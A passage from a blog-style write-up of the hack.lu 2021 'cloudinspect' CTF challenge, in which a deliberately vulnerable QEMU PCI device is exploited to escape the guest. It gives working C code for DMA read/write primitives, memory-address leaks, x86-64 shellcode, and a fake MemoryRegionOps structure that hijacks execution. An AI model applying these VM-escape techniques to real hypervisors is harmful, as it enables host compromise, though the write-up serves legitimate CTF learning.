&#x27;CONFIG_EDU&#x27;, if_true: files(&#x27;edu.c&#x27;))</span><br><span class="line"><span class="addition">+softmmu_ss.add(files(&#x27;cloudinspect.c&#x27;))</span></span><br><span class="line"> softmmu_ss.add(when: &#x27;CONFIG_FW_CFG_DMA&#x27;, if_true: files(&#x27;vmcoreinfo.c&#x27;))</span><br><span class="line"> softmmu_ss.add(when: &#x27;CONFIG_ISA_DEBUG&#x27;, if_true: files(&#x27;debugexit.c&#x27;))</span><br><span class="line"> softmmu_ss.add(when: &#x27;CONFIG_ISA_TESTDEV&#x27;, if_true: files(&#x27;pc-testdev.c&#x27;))</span><br></pre></td></tr></table></figure>

<p>The first thing I did when I saw this was to check out how <code>memory_region_init_io</code> and <code>pci_register_bar</code> functions work. It sounds a bit like like a kernel device which registers a few handlers for basic operations like read &#x2F; write &#x2F; ioctl. Very quickly I found two write up from dangokyo <a target="_blank" rel="noopener" href="https://dangokyo.me/2018/03/28/qemu-internal-pci-device/">this one</a>  and <a target="_blank" rel="noopener" href="https://dangokyo.me/2018/03/25/hitb-xctf-2017-babyqemu-write-up/">this other one</a>, I recommend you to check it out, they are pretty interesting and well written.</p>
<p>PCI stands for Peripheral Component Interconnect, that’s a standard that describes the interactions between the cpu and the other physical devices. The PCI device handles the interactions between the system and the physical device. To do so,  the PCI handler is providing a physical address space to the kernel, reachable through the kernel abstractions from a particular virtual address space. This address can be used to cache some data, but that’s mainly used to request a particular behavior from the kernel to the physical devices. These requests are written at a well defined offset in the PCI address space, that are the I&#x2F;O registers. And in the same way, the devices are waiting for some values at these locations to trigger a particular behavior. Check out <a target="_blank" rel="noopener" href="https://tldp.org/LDP/tlk/dd/pci.html">this</a> and <a target="_blank" rel="noopener" href="https://www.kernel.org/doc/html/latest/PCI/pci.html#mmio-space-and-write-posting">this</a> to learn more about PCI devices!</p>
<p>Now we know a bit more about PCI devices, we can see that the patched code is a PCI interface between the linux guest operating system and .. <em>nothing</em>. That’s just a vulnerable PCI device which allows us to read and write four I&#x2F;O registers (<code>CNT</code>, <code>SRC</code>, <code>CMD</code> and <code>DST</code>). According to these registers, we can read and write at an arbitrary location. There is a check about the size we’re requesting for read &#x2F; write operations at a particular offset from the <code>dmabuf</code> base address, but since we control the offset it does not matter.</p>
<p>To write these registers from userland, we need to <code>mmap</code> the right <code>resource</code> file corresponding to the PCI device. Then we just have to read or write the mapped file at an offset corresponding to the the register we want to read &#x2F; write. Furthermore, the arbitrary read &#x2F; write primitives provided by the device need to read to &#x2F; from a memory area from its physical address the data we want to read &#x2F; write.</p>
<p>The resource file can be found by getting a shell on the machine to take a look at the output of the <code>lspci</code> command.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/ # lspci -v</span><br><span class="line">00:01.0 Class 0601: 8086:7000</span><br><span class="line">00:00.0 Class 0600: 8086:1237</span><br><span class="line">00:01.3 Class 0680: 8086:7113</span><br><span class="line">00:01.1 Class 0101: 8086:7010</span><br><span class="line">00:02.0 Class 00ff: 1337:1337</span><br></pre></td></tr></table></figure>

<p>The output of the command is structured like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Field 1 : 00:02.0 : bus number (00), device number (02) and function (0)</span><br><span class="line">Field 2 : 00ff    : device class</span><br><span class="line">Field 3 : 1337    : vendor ID</span><br><span class="line">Field 4 : 1337    : device ID</span><br></pre></td></tr></table></figure>

<p>According to the source code of the PCI device, the vendor ID and the device ID are <code>0x1337</code>, the resource file corresponding to the device is so <code>/sys/devices/pci0000:00/0000:00:02.0/resource0</code>.</p>
<h2 id="Device-interactions"><a href="#Device-interactions" class="headerlink" title="Device interactions"></a>Device interactions</h2><p>What we need to interact with the device is to get the physical address of a memory area we control, which would act like a shared buffer between our program and the PCI device. To do so we can <code>mmap</code> a few pages, <code>malloc</code> a buffer or just allocate onto the function’s stackframe a large buffer. Given that I was following the thedangokyo’s write up, I just retrieved a few functions he was using and especially for the shared buffer.</p>
<p>The function used to get the physical address corresponding to an arbitrary pointer is based on the <code>/proc/self/pagemap</code> pseudo-file, for which you can read the format <a target="_blank" rel="noopener" href="https://www.kernel.org/doc/Documentation/vm/pagemap.txt">here</a>. The virt2phys function looks like this:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">uint64_t</span> <span class="title function_">virt2phys</span><span class="params">(<span class="type">void</span>* p)</span></span><br><span class="line">&#123;</span><br><span class="line">		<span class="type">uint64_t</span> virt = (<span class="type">uint64_t</span>)p;</span><br><span class="line">		assert((virt &amp; <span class="number">0xfff</span>) == <span class="number">0</span>);</span><br><span class="line">		<span class="type">int</span> fd = open(<span class="string">&quot;/proc/self/pagemap&quot;</span>, O_RDONLY);</span><br><span class="line">		<span class="keyword">if</span> (fd == <span class="number">-1</span>)</span><br><span class="line">				perror(<span class="string">&quot;open&quot;</span>);</span><br><span class="line">		<span class="type">uint64_t</span> offset = (virt / <span class="number">0x1000</span>) * <span class="number">8</span>;</span><br><span class="line">		<span class="comment">// the pagemap associates each mapped page of the virtual address space </span></span><br><span class="line">		<span class="comment">// with its PTE entry, the entry corresponding to the page is at address / PAGE_SZ</span></span><br><span class="line">		<span class="comment">// and because that&#x27;s an array of 64 bits entry, to access the right entry, the</span></span><br><span class="line">		<span class="comment">// offset is multiplied per 8. </span></span><br><span class="line">		lseek(fd, offset, SEEK_SET);</span><br><span class="line">		<span class="type">uint64_t</span> phys;</span><br><span class="line">		<span class="keyword">if</span> (read(fd, &amp;phys, <span class="number">8</span> ) != <span class="number">8</span>)</span><br><span class="line">				perror(<span class="string">&quot;read&quot;</span>);</span><br><span class="line">		assert(phys &amp; (<span class="number">1ULL</span> &lt;&lt; <span class="number">63</span>));</span><br><span class="line">		<span class="comment">// asserts the bit IS_PRESENT is set</span></span><br><span class="line">		phys = (phys &amp; ((<span class="number">1ULL</span> &lt;&lt; <span class="number">54</span>) - <span class="number">1</span>)) * <span class="number">0x1000</span>;</span><br><span class="line">		<span class="comment">// flips out the status bits, and shifts the physical frame address to 64 bits</span></span><br><span class="line">		<span class="keyword">return</span> phys;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>To interact with the device we can write the code right bellow:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;inttypes.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdbool.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span>* iomem;</span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span>* dmabuf;</span><br><span class="line"><span class="type">uint64_t</span> dmabuf_phys_addr;</span><br><span class="line"><span class="type">int</span> fd;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PATH <span class="string">&quot;/sys/devices/pci0000:00/0000:00:02.0/resource0&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">iowrite</span><span class="params">(<span class="type">uint64_t</span> addr, <span class="type">uint64_t</span> value)</span></span><br><span class="line">&#123;</span><br><span class="line">		*((<span class="type">uint64_t</span>*)(iomem + addr)) = value;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">uint64_t</span> <span class="title function_">ioread</span><span class="params">(<span class="type">uint64_t</span> addr)</span></span><br><span class="line">&#123;</span><br><span class="line">		<span class="keyword">return</span> *((<span class="type">uint64_t</span>*)(iomem + addr));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">uint64_t</span> <span class="title function_">write_dmabuf</span><span class="params">(<span class="type">uint64_t</span> offt, <span class="type">uint64_t</span> value)</span> &#123;</span><br><span class="line">		*(<span class="type">uint64_t</span>* )dmabuf = value;</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, offt);</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, <span class="number">8</span>);</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr);</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, <span class="number">0x300</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">uint64_t</span> <span class="title function_">read_offt</span><span class="params">(<span class="type">uint64_t</span> offt)</span> &#123;</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, offt);</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, <span class="number">8</span>);</span><br><span class="line">		iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, dmabuf_phys_addr);</span><br><span class="line">		ioread(CLOUDINSPECT_MMIO_OFFSET_TRIGGER);</span><br><span class="line">		<span class="keyword">return</span> *(<span class="type">uint64_t</span>* )dmabuf;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">		<span class="type">int</span> fd1 = open(PATH, O_RDWR | O_SYNC);</span><br><span class="line">		<span class="keyword">if</span> (<span class="number">-1</span> == fd1) &#123;</span><br><span class="line">				<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;Cannot open %s\n&quot;</span>, PATH);</span><br><span class="line">				<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">		&#125; <span class="comment">// open resource0 to interact with the device</span></span><br><span class="line">		</span><br><span class="line">		iomem = mmap(<span class="number">0</span>, <span class="number">0x1000</span>, PROT_READ | PROT_WRITE, MAP_SHARED, fd1, <span class="number">0</span>); <span class="comment">// map resource0</span></span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;iomem @ %p\n&quot;</span>, iomem);</span><br><span class="line">		</span><br><span class="line">		fd = open(<span class="string">&quot;/proc/self/pagemap&quot;</span>, O_RDONLY);</span><br><span class="line">		<span class="keyword">if</span> (fd &lt; <span class="number">0</span>) &#123;</span><br><span class="line">				perror(<span class="string">&quot;open&quot;</span>);</span><br><span class="line">				<span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		dmabuf = <span class="built_in">malloc</span>(<span class="number">0x1000</span>);</span><br><span class="line">		<span class="built_in">memset</span>(dmabuf, <span class="string">&#x27;\x00&#x27;</span>, <span class="keyword">sizeof</span>(dmabuf));</span><br><span class="line">		<span class="keyword">if</span> (MAP_FAILED == iomem) &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		mlock(dmabuf, <span class="number">0x1000</span>); <span class="comment">// trigger PAGE_FAULT to acually map the page</span></span><br><span class="line">		dmabuf_phys_addr = virt2phys(dmabuf); <span class="comment">// grab physical address according to pagemap</span></span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;DMA buffer (virt) @ %p\n&quot;</span>, dmabuf);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;DMA buffer (phys) @ %p\n&quot;</span>, (<span class="type">void</span>*)dmabuf_phys_addr);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Now we can interact with the device we got two primitive of arbitrary read &#x2F; write. The <code>read_offt</code> and <code>write_dmabuf</code> functions permit us to read &#x2F; write a 8 bytes to an arbitrary offset from the <code>dmabuf</code> object address.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>I did a lot of things which didn’t worked, so let’s summarize all my thoughts:</p>
<ul>
<li>If we leak the object’s address, we can write at any location for which we know the base address, for example overwrite GOT pointers (but it will not succeed because of RELRO).</li>
<li>If we take a look at all the memory areas mapped in the qemu process we can see very large memory area in rwx, which means if we can leak its address and if we can redirect RIP, we just have to write and jmp on a shellcode written in this area.</li>
<li>To achieve the leaks, given that the CloudInspectState structure is allocated on the heap, and that we can read &#x2F; write at an arbitrary offset from the object’s address we can:<ul>
<li>Scan heap memory for pointers to the qemu binary to leak the base address of the binary.</li>
<li>Scan heap memory  for pointers to the heap itself (next, prev pointers for freed objects for example), and then compute the object’s address.</li>
<li>Scan heap memory to leak the rwx memory area</li>
<li>Scan all the memory area we can read to find a leak of the rwx memory area.</li>
</ul>
</li>
<li>To redirect RIP I thought to:<ul>
<li>Overwrite the <code>destructor</code> function pointer in the <code>MemoryRegion</code> structure.</li>
<li>Write in a writable area a fake <code>MemoryRegionOps</code> structure  for which a certain handler points to our shellcode and make <code>CloudInspectState.mmio.ops</code> point to it.</li>
</ul>
</li>
</ul>
<p>According to the environment, scan the heap memory is not reliable at all. I succeed to leak the rwx memory area, the binary base address, the heap base address from some contiguous objects in the heap. To redirect RIP, for some reason, the <code>destructor</code> is never called, so we have to craft a fake <code>MemoryRegionOps</code> structure. And that’s how I read the flag on the disk. But the issue is that remotely, the offset between the heap base and the object is not the same, furthermore, the offset for the rwx memory leak is I guess different as well. So we have to find a different way to leak the object and the rwx memory area.</p>
<h3 id="Leak-some-memory-areas"><a href="#Leak-some-memory-areas" class="headerlink" title="Leak some memory areas"></a>Leak some memory areas</h3><p>To see where we can find pointers to the rwx memory area, we can make use of the <code>search</code> command in <code>pwndbg</code>:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; vmmap                                                                                                                                                                              </span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA                                                                                                                                            </span><br><span class="line">    0x559a884e1000     0x559a88791000 r--p   2b0000 0      /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 </span><br><span class="line">    0x559a88791000     0x559a88c5d000 r-xp   4cc000 2b0000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 </span><br><span class="line">    0x559a88c5d000     0x559a890ff000 r--p   4a2000 77c000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 </span><br><span class="line">    0x559a89100000     0x559a89262000 r--p   162000 c1e000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 </span><br><span class="line">    0x559a89262000     0x559a89353000 rw-p    f1000 d80000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 </span><br><span class="line">    0x559a89353000     0x559a89377000 rw-p    24000 0      [anon_559a89353]                                                                                                                    </span><br><span class="line">    0x559a8a059000     0x559a8b0e7000 rw-p  108e000 0      [heap]                                                                                                                              </span><br><span class="line">    0x7fc5f4000000     0x7fc5f4a37000 rw-p   a37000 0      [anon_7fc5f4000]                                                                                                              </span><br><span class="line">    0x7fc5f4a37000     0x7fc5f8000000 ---p  35c9000 0      [anon_7fc5f4a37]                                                                                                                    </span><br><span class="line">    0x7fc5fbe00000     0x7fc603e00000 rw-p  8000000 0      [anon_7fc5fbe00]                                                                                                                    </span><br><span class="line">    0x7fc603e00000     0x7fc603e01000 ---p     1000 0      [anon_7fc603e00]                                                                                                                    </span><br><span class="line">    0x7fc604000000     0x7fc643fff000 rwxp 3ffff000 0      [anon_7fc604000]                                                                                                                  </span><br><span class="line">    [SKIP]</span><br><span class="line">pwndbg&gt; search -4 0x7fc60400 -w                                                                                                                                                                </span><br><span class="line">[anon_559a89353] 0x559a89359002 0x7fc60400                                                                                                                                                     </span><br><span class="line">[anon_559a89353] 0x559a8935904a 0x7fc60400                                                                                                                                                     </span><br><span class="line">[anon_559a89353] 0x559a89359052 0x1600007fc60400                                                                                                                                               </span><br><span class="line">[anon_559a89353] 0x559a8935905a 0x2d00007fc60400                                                                                                                                               </span><br><span class="line">[anon_559a89353] 0x559a89359062 0xffd300007fc60400                                                                                                                                             </span><br><span class="line">[anon_559a89353] 0x559a89359072 0x7fc60400                                                                                                                                                     </span><br><span class="line">[anon_559a89353] 0x559a89372b2a 0x10100007fc60400                                                                                                                                              </span><br><span class="line">[anon_559a89353] 0x559a89372bb2 0x100000007fc60400                                                                                                                                             </span><br><span class="line">[anon_559a89353] 0x559a89372bba 0xf00000007fc60400                                                                                                                                             </span><br><span class="line">[heap]          0x559a8a2dccf2 0x2d00007fc60400                                                                                                                                                </span><br><span class="line">[heap]          0x559a8a2dccfa 0x7fc60400                                                                                                                                                      </span><br><span class="line">[heap]          0x559a8a2dcd6a 0x7fc60400                                                                                                                                                      </span><br><span class="line">[heap]          0x559a8a2dcefa 0xffd300007fc60400                                                                                                                                              </span><br><span class="line">[heap]          0x559a8a2dcf18 0x7fc60400                                                                                                                                                      </span><br><span class="line">[SKIP]</span><br></pre></td></tr></table></figure>

<p>Given that we don’t want to get the leak from heap because of the unreliability we can see that there are available leaks in a writable area of the binary in <code>anon_559a89353</code>, indeed the page address looks like a PIE based binary address or an heap address (but the address is not marked heap), and if we look more carefully, the page is contiguous to the last file mapped memory area. Now we can leak the rwx memory area, lets’ find a way to leak object’s address! I asked on the hack.lu discord a hint for this leak because didn’t have any idea. And finally it’s quite easy, we can just leak the <code>opaque</code> pointer in the <code>MemoryRegion</code> structure which points to the object’s address.</p>
<p>If I summarize we have:</p>
<ul>
<li>A reliable leak of: <ul>
<li>the object’s address with the <code>opaque</code> pointer</li>
<li>the binary base address (from the heap)</li>
<li>the rwx memory area (writable memory area that belongs to the binary).</li>
</ul>
</li>
</ul>
<p>Then we can write this code:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// offset I got in gdb locally</span></span><br><span class="line"><span class="type">uint64_t</span> base = read_offt(<span class="number">0x10c0</span> + <span class="number">8</span>*<span class="number">3</span>) - <span class="number">0xdef90</span>; <span class="comment">// heap leak</span></span><br><span class="line"><span class="type">uint64_t</span> bss = base + <span class="number">0xbc2000</span>; <span class="comment">// points to the anonnymous memory area right after the binary</span></span><br><span class="line"><span class="type">uint64_t</span> heap_base = read_offt(<span class="number">0x1000</span> + <span class="number">8</span>*<span class="number">3</span>) - <span class="number">0xf3bff0</span>; <span class="comment">// useless</span></span><br><span class="line"><span class="type">uint64_t</span> ops_struct = read_offt(<span class="number">-0xd0</span>); <span class="comment">// That&#x27;s &amp;ClouInspctState.mmio.ops</span></span><br><span class="line"><span class="type">uint64_t</span> addr_obj = read_offt(-(<span class="number">0xd0</span><span class="number">-8</span>)) + <span class="number">2568</span>; <span class="comment">// CloudInspectState.mmio.opaque</span></span><br><span class="line"><span class="type">uint64_t</span> leak_rwx = read_offt((bss + <span class="number">0x6000</span>) - addr_obj) &amp; ~<span class="number">0xffff</span>; <span class="comment">// leak in the bss</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] ops_struct: %lx\n&quot;</span>, ops_struct);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] Binary base address: %lx\n&quot;</span>, base);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] Heap base address: %lx\n&quot;</span>, heap_base);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] Leak rwx: %lx\n&quot;</span>, leak_rwx);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] Addr obj: %lx\n&quot;</span>, addr_obj);</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">[*] ops_struct: 559a89173f20</span></span><br><span class="line"><span class="comment">[*] Binary base address: 559a88791000</span></span><br><span class="line"><span class="comment">[*] Heap base address: 559a8a0561d0</span></span><br><span class="line"><span class="comment">[*] Leak rwx: 7fc604000000</span></span><br><span class="line"><span class="comment">[*] Addr obj: 559a8af92f88</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<h3 id="Write-the-shellcode"><a href="#Write-the-shellcode" class="headerlink" title="Write the shellcode"></a>Write the shellcode</h3><p>I choose to write a shellcode to read the flag at <code>leak_rwx + 0x5000</code>, a known location we can easily read and print from the program. The shellcode is very simple:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">mov rax, 2 ; SYS_open</span><br><span class="line">push 0x67616c66 ; flag in little endian</span><br><span class="line">mov rdi, rsp ; pointer flag string</span><br><span class="line">mov rsi, 0 ; O_READ</span><br><span class="line">mov rdx, 0x1fd ; mode ?</span><br><span class="line">syscall</span><br><span class="line">mov rdi, rax ; fd</span><br><span class="line">xor rax, rax ; SYS_read</span><br><span class="line">lea rsi, [rip] ; pointer to the rwx memory area (cause we&#x27;re executing code within)</span><br><span class="line">and rsi, 0xffffffffff000000 ; compute the base address</span><br><span class="line">add rsi, 0x5000 ; add the right offset</span><br><span class="line">mov rdx, 0x30 ; length of the flag to read</span><br><span class="line">syscall</span><br><span class="line">add rsp, 8; we pushed the flag str so we destroy it</span><br><span class="line">ret ; return to continue the execution</span><br></pre></td></tr></table></figure>

<p>To write the shellcode at <code>leak_rwx + 0x1000</code>, we can directly trigger a large write primitive:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> CODE <span class="string">&quot;\x48\xc7\xc0\x02\x00\x00\x00\x68\x66\x6c\x61\x67\x48\x89\xe7\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc2\xfd\x01\x00\x00\x0f\x05\x48\x89\xc7\x48\x31\xc0\x48\x8d\x35\x00\x00\x00\x00\x48\x81\xe6\x00\x00\x00\xff\x48\x81\xc6\x00\x50\x00\x00\x48\xc7\xc2\x30\x00\x00\x00\x0f\x05\x48\x83\xc4\x08\xc3&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="built_in">memcpy</span>(dmabuf, CODE, <span class="number">130</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] Writing the shellcode @ %lx\n&quot;</span>, leak_rwx + <span class="number">0x1000</span>);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, leak_rwx - addr_obj + <span class="number">0x1000</span>);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, <span class="number">130</span>);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, <span class="number">0x300</span>);</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">[*] Writing the shellcode @ 7fc604001000</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<h3 id="Craft-fake-MemoryRegionOps-structure"><a href="#Craft-fake-MemoryRegionOps-structure" class="headerlink" title="Craft fake MemoryRegionOps structure"></a>Craft fake MemoryRegionOps structure</h3><p>To cratf a fake <code>MemoryRegionOps</code>, I just read the original <code>MemoryRegionOps</code> structure, I edited the <code>read</code> handler, and I wrote it back, in a writable memory area, at <code>leak_rwx+0x2000</code>. Given that <code>sizeof(MemoryRegionOps)</code> is not superior to <code>DMA_SIZE</code>, I can read and write in one time. Then we got:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Craft fake MemoryRegionOps structure by reading the original one</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">MemoryRegionOps</span> <span class="title">fake_ops</span> =</span> &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] reading struct mmio.MemoryRegionOps @ %lx\n&quot;</span>, ops_struct);</span><br><span class="line"></span><br><span 